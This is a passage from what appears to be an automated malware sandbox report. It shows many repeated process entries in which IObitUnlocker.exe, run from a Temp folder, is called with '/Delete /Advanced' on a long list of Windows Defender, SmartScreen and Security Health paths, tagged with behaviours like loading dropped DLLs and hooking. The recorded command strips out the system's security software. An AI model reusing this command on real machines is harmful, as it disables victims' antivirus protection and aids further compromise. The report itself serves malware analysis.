Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
        10⤵
        Loads dropped DLL
        Suspicious use of SetWindowsHookEx
        
        PID:2892
        
        C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
        
        C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
        10⤵
        Loads dropped DLL
        Suspicious use of SetWindowsHookEx
        
        PID:2664
        
        C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
        
        C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
        10⤵
        Loads dropped DLL
        Suspicious use of SetWindowsHookEx
        
        PID:3160
        
        C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
        
        C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
        10⤵
        Loads dropped DLL
        Suspicious use of SetWindowsHookEx
        
        PID:3512
        
        C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
        
        C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
        10⤵
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        Suspicious use of SetWindowsHookEx
        
        PID:112
        
        C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
        
        C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
        10⤵
        Loads dropped DLL
        Suspicious use of SetWindowsHookEx
        
        PID:1492
        
        C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
        
        C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
        10⤵
        Loads dropped DLL
        Suspicious use of SetWindowsHookEx
        
        PID:2700
        
        C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
        
        C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
        10⤵
        Loads dropped DLL
        Suspicious use of SetWindowsHookEx
        
        PID:2940
        
        C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
        
        C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
        10⤵
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        Suspicious use of SetWindowsHookEx
        
        PID:4136
        
        C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
        
        C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
        10⤵
        Loads dropped DLL
        Suspicious use of SetWindowsHookEx
        
        PID:4536
        
        C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
        
        C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
        10⤵
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        Suspicious use of SetWindowsHookEx
        
        PID:4788
        
        C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
        
        C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.